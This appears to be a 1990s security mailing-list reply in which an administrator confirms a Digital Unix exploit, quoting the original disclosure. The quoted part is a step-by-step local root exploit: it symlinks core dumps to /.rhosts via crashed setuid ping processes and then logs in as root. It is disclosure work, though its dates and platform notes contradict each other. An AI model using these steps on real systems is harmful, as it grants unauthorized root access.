Just to confirm:
DEC Unix 4.0d:
21158 Memory fault - core dumped
$ ls -la core
21159 Memory fault - core dumped
lrwxrwxrwx 1 jonz staff 8 Apr 6 15:18 core -> /.rhosts
$ ls -la /.rhosts
-rw------- 1 root system 458752 Apr 6 15:18 /.rhosts
$
Thank you,
Jonathan A. Zdziarski
Systems Administrator
Netrail Incorporated
888-NETRAIL
jonz@netrail.net
On Sun, 6 Apr 1997, root wrote:
:Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN]
:(28/03/1998)
:
:Starting 2 suid root programs in background, and killing them with -11 flag,
:we'll have a core root owned with our gid and mode 600. Then is enough a
:symlink
:to create a file everywhere...like /.rhosts.
:
:rusty@mad.it soren@atlink.it
:
:$ ls -l /.rhosts
:/.rhosts not found
:$ ls -l /usr/sbin/ping
:-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
:$ ln -s /.rhosts core
:$ IMP='
:>+ +
:>'
:$ ping somehost &
:[1] 1337
:$ ping somehost &
:[2] 31337
:$ kill -11 31337
:$ kill -11 1337
:[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
:[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
:$ ls -l /.rhosts
:-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
: ##/.rhosts has been created....that's all.##
:$ rlogin localhost -l root
:
:Is a very serious problem, it needs a fix as soon as possible,
:infact we can have a DoS if we link our core to the kernel.
:
:
:Other platforms:
:
:SunOs 4.1.x 5.5.x Doesn't work
:Linux 2.0.x Doesn't work
:Digital Unix 4.0d Doesn't work
:Others (note tested yet)
: